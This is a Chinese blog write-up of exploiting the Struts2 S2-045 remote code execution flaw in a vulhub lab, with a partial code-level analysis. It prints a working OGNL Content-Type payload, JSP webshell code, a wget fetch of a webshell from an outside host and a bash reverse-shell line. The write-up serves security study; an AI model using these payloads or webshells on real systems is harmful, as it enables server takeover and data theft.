struts2漏洞_有没有兴趣研究Remote Code Execution漏洞利用?

最新推荐文章于 2024-04-19 16:59:50 发布
最新推荐文章于 2024-04-19 16:59:50 发布
阅读量402 收藏
点赞数
文章标签: struts2漏洞

本期文档内容为:《S2-045 Remote Code Execution漏洞利用》

作者介绍:Fhawkz

福建师范大学18级学生,国科学生会安全团队的一员,本人对技术喜欢进行钻研,平时也爱鼓捣一些安全的相关技术,本次分享是自己在日常学习中有用到的一些技术,希望给大家带来一些安全学习上的帮助。

0x00漏洞背景

Struts2是第二代基于Model-View-Controller(MVC)模型的java企业级web应用框架,并成为当时国内外较为流行的容器软件中间件。jakarta是apache组织下的一套Java解决方案的开源软件的名称,包括很多子项目。Struts就是jakarta的紧密关联项目。

根据CNVD技术组成员单位——杭州安恒信息技术有限公司提供的分析情况,基于JakartaMultipart parser的文件上传模块在处理文件上传(multipart)的请求时候对异常信息做了捕获,并对异常信息做了OGNL表达式处理。但在在判断content-type不正确的时候会抛出异常并且带上Content-Type属性值,可通过精心构造附带OGNL表达的URL导致远程代码执行。

CNVD对漏洞的综合评级均为“高危”。由于struts 2.3.5之前的版本存在S2-016漏洞,因此有较多升级后的Apache struts2的版本为2.3.5及以上版本,极有可能受到漏洞的影响。

0x01受影响版本

Struts2.3.5-Struts2.3.31

Struts2.5-Struts2.5.10

0x02漏洞搭建

a. 从git仓库获取vulhub

1) gitclone https://github.com/vulhub/vulhub.git

b. docker-compose工具的下载

c. 在docker-compose.yml中有端口映射关系

7dd99563550de31d1db7b481625d528e.png

d. 环境创建docker-compose -d up

e. 查看环境docker ps -a

393eb2ca6d19666c63c483a81dfde974.png

f. 进入docker的bash:docker exec -t -i CONTAINER ID /bin/bash

18bea52490700ed3618f60b3d2d06ec8.png

0x03POC检测漏洞存在

a. 访问环境

874cf9b88086e7d603aead722d6cf969.png

b. 抓包,使用vulhub自带的poc验证

Content-Type:%{#context['com.opensymphony.xwork2.dispatcher.HttpServletResponse'].addHeader('vulhub',233*233)}.multipart/form-data

发送multipart/form-data使得能够对ognl表达式进行解析执行

addHeader('vulhub',233*233):添加头部的名称为vulhub,值为233*233

bf08d652da7633465397d68ae0abe999.png

c. 使用百度到的poc,实现命令执行操作

POC:

Content-Type:"%{(#bm='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='ls').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=newjava.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}"

cfd9f14f59432cd5e222c7547c4fa37f.png

0x04根据POC编写简单的利用程序

a. 设置poc的列表,获取输入,并赋值到#cmd上;使用urllib2.Request构造web请求

b. 设置两个参数,method及target

cca5a04c9c95f4e49739e130db8f2492.png

脚本文件:

myself_s2scan.py

0x05文件上传

a. 通过POC上传jsp一句话并写入到.jsp文件中

#cmd=’name="<%if(request.getParameter("f")!=null)(newjava.io.FileOutputStream(application.getRealPath("")+request.getParameter("f"))).write(request.getParameter("t").getBytes());%>"&&echo$name’

本地执行没有问题

但是如果在poc上插入命令会出现报错

技术水平不够,暂时不知道其他方式

b. 通过网上的html连接器并上传菜刀马

c0032316d6d6ccd19a2b646889842ca9.png

在提交代码处填写菜刀马

连接器代码:

test.html

c. 利用菜刀程序连接webshell

网上相关找到的jsp菜刀马

cknife.txt

d. 找到了新的能用的jspx菜刀马

e. 尝试用下载的思路进行传递,能绕过编码问题

1) name="wgetfhbebaidu.top/1.jspx"&&echo $name > final.txt && chmod+x final.txt

678c966b2ab65f637bbce54021d6bbe3.png

2) ./final.txt

07946fa3a96681040568e1440276a4f7.png

3) 通过寻找我们能访问到的文件,来获得web站点的相对路径

5e301b557da2f40459b63c937b696353.png

4) mv1.jspx ./src/main/webapp/[能访问到的web目录]

01289b35fc3ef6122b142ac346db4984.png

f. 使用Cknife进行连接尝试即可

44f3c7ea790e7aa6feba61b1d8519921.png

0x06反弹Shell

a. 主要利用的payload

bash -i >&/dec/tcp/192.168.16.133[攻击者ip]/7001[port] 0 > &1

依赖输出重定向,将bash反弹给某个ip的某个端口

b. 用nc工具监听设置的port

2cba57fb096d2f91f5d48e32655fdf53.png

c. 在poc中插入payload并执行

6138ce1fad254203da89c50c6db3482d.png

ef414609833db61e2177bf7734e93455.png

d. 可以在监听的攻击方上得到对应的shell

bb0b37a3d8d3fe05f820ec95b7e89ba3.png

0x07漏洞成因分析

参考网站:https://www.anquanke.com/post/id/85628

在org.apache.struts2dispatcherngfilterStrust2PrepareAndExecuteFilter对request进行封装

69dfd71ef4cd983101bf84fe68a42982.png

封装流程:ngPrepareOperations

f7330bda1e087bacdd5f6afada07d62f.png


dispatcherDispatcher

这或许是每个poc中的Content-Type都含有multipart/form-data的原因

32f3241d0667a83a95ec3304646ead78.png

getMultiPartRequest()
这里开始看不懂

先声明名为mpr的MultiPartRequest接口

然后在getContainer()获取一个实例类返回

b2ec0016eaa2c79fab986fa06264fd0b.png

实例化一个MultiPartRequestWrapper对象

8a9667fa6f9f63962c4c79d4a4297239.png

或许ognl被执行在这之前已经找到入口了,但是我看不出来……

具体觉得那个参考文献写的应该挺清除

需要有点Java功底的才能了解清楚

4fb44827f6390c26bcf71531dfdf17f3.png

c2cec91da694d670add3995d2787d716.png

0x08OGNL语法分析

%{ //强制解析为ongl表达式

(#bm='multipart/form-data'). //整个漏洞的入口点,在漏洞分析中有体现 (#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS). //看起来像是得到一个常量并赋给dm (#_memberAccess?(#_memberAccess=#dm): ((#container=#context['com.opensymphony.xwork2.ActionContext.container']). (#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)). (#ognlUtil.getExcludedPackageNames().clear()). (#ognlUtil.getExcludedClasses().clear()). (#context.setMemberAccess(#dm)))). (#cmd='ls'). //定义要执行什么命令的变量(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))). //通过os.name返回的字符串中是否包含win来判断操作系统是windows还是其他类型 (#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})). //如果是windows则调用cmd.exe否则调用/bin/bash执行之前cmd变量的命令 (#p=new java.lang.ProcessBuilder(#cmds)). (#p.redirectErrorStream(true)). (#process=#p.start()). //发起进程(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)). (#ros.flush()) }

8181e59c70e030b4282edff07b976b6a.png
weixin_39899244
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
K8_Struts2_EXP S2-045.rar
02-22
K8 Struts2 综合漏洞利用工具 (Apache Struts Remote Code Execution Exploit) Struts2漏洞检测工具 Struts2漏洞测试工具 K8 struts2 exploit Test Struts2 GetShell 目前已支持以下struts2漏洞编号 (S2-032 s2-020 ...
漏洞扫描工具系列-1.1
04-01
在IT安全领域,漏洞扫描工具是至关重要的辅助手段,它们帮助我们发现系统、网络或应用程序中的安全漏洞,以便及时修补,防止黑客攻击。本篇主要介绍的是“漏洞扫描工具系列-1.1”,这是一个初步的教程,后续还会有更...
Hugging Face Transformers 之 AutoConfig 、AutoTokenizer、AutoModel from_pretrained()参数详解
luckyuxuan的博客
10-25 1万+
Hugging Face Transformers 之 AutoConfig 、AutoTokenizer、AutoModel from_pretrained()参数详解
抱抱脸(hugging face)教程-中文翻译-共享定制模型
wwlsm_zql的博客
03-29 4879
共享定制模型 Transformers库的设计很容易扩展。每个模型都完整地编码在存储库的给定子文件夹中,有任何抽象,因此您可以轻松地复制建模文件并根据需要对其进行调整。 如果您正在编写一个全新的模型,那么从头开始可能会更容易。在本教程中,我们将向您展示如何编写一个自定义模型及其配置,以便它可以在 Transformers 内部使用,以及如何与社区共享它(通过它所依赖的代码) ,以便任何人都可以使用它,即使它不在 Transformers 库中。 我们将通过将 timm 库的 ResNet 类包装到 Pre
Qwen+langchain使用流程
最新发布
砥砺前行,持之以恒
04-19 2049
千问和langchain初探
ChatGLM-Tuning/infer.ipynb 源码解析
人工智能曾小健
06-21 1112
这段代码主要是使用预训练的模型来生成一些文本,具体来说,它是从一个json文件中读取一些指令,并使用模型来生成相应的答案。:将out_text中的input_text和"\nEND"替换为空,然后去除两端的空白字符,返回的结果赋值给answer。:使用模型对input_ids进行生成,生成的最大长度为150,不进行采样,温度为0。这段代码的主要目的是使用预训练的模型对一些指令进行生成,并将生成的结果保存到answers列表中。这段代码的主要目的是使用预训练的模型对一些指令进行生成,并将生成的结果保存到。
开源LLM微调训练指南:如何打造属于自己的LLM模型
FrenzyTechAI的博客
07-05 6187
今天我们来聊一聊关于LLM的微调训练,LLM应该算是目前当之无愧的最有影响力的AI技术。尽管它只是一个语言模型,但它具备理解和生成人类语言的能力,非常厉害!它可以革新各个行业,包括自然语言处理、机器翻译、内容创作和客户服务等,成为未来商业环境的重要组成部分。
ChatGLM-6B 类似ChatGPT功能型对话大模型 部署实践
绀目澄清
03-19 9592
ChatGLM(alpha内测版:QAGLM)是一个初具问答和对话功能的中英双语模型,当前仅针对中文优化,多轮和逻辑能力相对有限,但其仍在持续迭代进化过程中,敬请期待模型涌现新能力。中英双语对话 GLM 模型:ChatGLM-6B,结合模型量化技术,用户可以在消费级的显卡上进行本地部署(INT4 量化级别下最低只需 6GB 显存)。
VAL2.rar_Symbolic execution_execution
09-14
在计算机科学领域,符号执行(Symbolic Execution)是一种强大的软件分析技术,它能够帮助我们理解和验证程序的行为,尤其在安全性分析和漏洞检测方面表现出色。而执行(Execution)则是指程序实际运行的过程,它...
struts2-057扫描工具
08-27
这个漏洞属于远程代码执行(Remote Code Execution, RCE)类型,允许攻击者通过精心构造的HTTP请求在服务器端执行任意代码,从而可能导致数据泄露、系统瘫痪甚至完全控制服务器。 **Struts2-057漏洞详解** Struts2-...
混合式漏洞挖掘研究进展.pdf
08-08
软件漏洞漏洞利用 围绕漏洞的网络攻防 漏洞挖掘、诊断及利用 自动化、智能化网络攻防 以Fuzzing为代表的动态分析 Fuzzing Grey-box Fuzzing 符号执行 动态符号执行 Concolic Execution Hybrid Fuzzing 需求分发...
Struts2远程命令执行漏洞解析
01-06
Struts2远程命令执行漏洞解析 漏洞解析 远程命令 Struts2
用Kaggle免费GPU微调ChatGLM2
Python_Ai_Road的博客
07-16 1892
前方干货预警:这篇文章可能是你目前能够找到的可以无痛跑通LLM微调并基本理解整个流程的门槛最低的入门范例。门槛低到什么程度,本范例假设你是一个三无用户。1,无NLP经验:你有扎实的NLP理论知识,只有一些基本的炼丹经验。关系,我们会在恰当的时候告诉你必要的原理。2,无GPU:你有任何一块可以使用的GPU。关系,我们直接在Kaggle环境上使用免费的P100GPU,并给有kaggle使用经...
[torch] torch profiler使用示例
Learning from the mistakes
06-23 1233
我给的示例是chatglm的,有需要的可以换成其他的模型,原理是一样的。
框架/组件漏洞系列1:struts2漏洞汇总
W0ngk,一个安全菜鸡,一直在模仿,尚未有超越。
12-03 9452
前言: 本篇文章中复现的漏洞不是特别全面,但是挑选了最近两年的漏洞进行复现,旨在对漏洞进行有用复现,毕竟一些老漏洞已经基本不存在了。 一、Struts简介 1、简介 基本介绍: Struts是Apache软件基金会(ASF)赞助的一个开源项目。它最初是Jakarta项目中的一个子项目,并在2004年3月成为ASF的顶级项目。它通过采用[Java Servlet](https://baike.baidu.com/item/Java Servlet)/JSP技术,实现了基于[Java EE](https://.
本地化部署大语言模型 ChatGLM
Maddie_Mo的博客
04-19 1万+
ChatGLM-6B 是一个开源的、支持中英双语的对话语言模型,基于 General Language Model (GLM) 架构,具有 62 亿参数。结合模型量化技术,用户可以在消费级的显卡上进行本地部署(INT4 量化级别下最低只需 6GB 显存)。ChatGLM-6B 使用了和 ChatGPT 相似的技术,针对中文问答和对话进行了优化。暂时先这样吧,如果有时间的话就会更新模型微调文章以及抽时间更新GLM130B的部署,实在看不明白就留言,看到我会回复的。路漫漫其修远兮,与君共勉。
ChatGLM-6B (介绍相关概念、基础环境搭建及部署)
热门推荐
王亮的博客
04-04 2万+
chatglm-6b详细部署步骤
Struts2 Jakarta远程执行代码测试
weixin_33923762的博客
03-07 199
为什么80%的码农都做不了架构师?>>> ...
最新Struts2安全漏洞(远程代码执行的严重)
菜鸟笔记
03-07 1677
安恒信息安全研究院 WEBIN 实验室高级安全研究员 n、Nike Zheng 发现了著名 J2EE 框架——Struts2 存在远程代码执行的严重漏洞。目前 Struts2 官方已经确认漏洞漏洞编号S2-045,CVE编号:cve-2017-5638),并定级为高危风险。 由于该漏洞影响范围较广(Struts 2.3.5 - Struts 2.3.31, Struts 2.5 - S
Remote Code Execution
07-14
远程代码执行(Remote Code Execution,简称RCE)是一种安全漏洞,可以允许攻击者在远程服务器上执行恶意代码。这种漏洞通常出现在应用程序或操作系统中,其中输入未经充分验证或过滤并且直接被解释为可执行代码。 ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值